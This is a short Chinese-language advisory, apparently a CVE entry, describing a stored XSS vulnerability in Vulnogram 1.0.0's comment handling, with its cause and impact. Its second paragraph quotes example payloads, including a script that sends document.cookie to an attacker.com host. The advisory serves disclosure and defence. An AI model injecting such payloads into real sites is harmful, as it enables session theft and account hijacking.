CVE-2026-32774CVE-2026-32774是Vulnogram 1.0.0版本中存在的一个存储型跨站脚本攻击(Stored XSS)漏洞。该漏洞位于评论超文本处理功能中,攻击者可以通过在评论字段中注入恶意脚本来触发此漏洞。当其他用户访问包含恶意代码的页面时,这些脚本会在受害者的浏览器中执行,从而窃取会话cookie、劫持用户账户或进行其他恶意操作。Vulnogram是一个开源的漏洞披露和管理平台,广泛用于安全社区进行漏洞情报共享。由于该漏洞为存储型XSS,恶意payload会永久保存在服务器端,所有访问受影响页面的用户都可能受到攻击,危害范围较广。攻击者利用该漏洞可以绕过同源策略限制,访问受害者的敏感信息,甚至在特定场景下可以进一步进行横向移动攻击。
该存储型XSS漏洞源于Vulnogram应用程序在处理用户提交的评论超文本时,未对输入内容进行充分的HTML转义和过滤。具体来说,当用户在漏洞披露页面的评论字段中提交包含JavaScript代码的内容时,后端服务器直接将用户输入存储到数据库中,而没有对特殊字符进行转义处理。随后,当其他用户浏览该页面时,服务器从数据库中检索评论内容并直接嵌入到HTML响应中,未经过任何输出编码。攻击者可以利用这一漏洞注入恶意JavaScript代码,如<img src=x onerror=alert(document.cookie)>或<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>等payload。由于存储型XSS的特性,这些恶意脚本会在页面加载时自动执行,影响所有访问该页面的用户。攻击者通常利用此漏洞窃取用户会话令牌、进行钓鱼攻击或植入恶意重定向。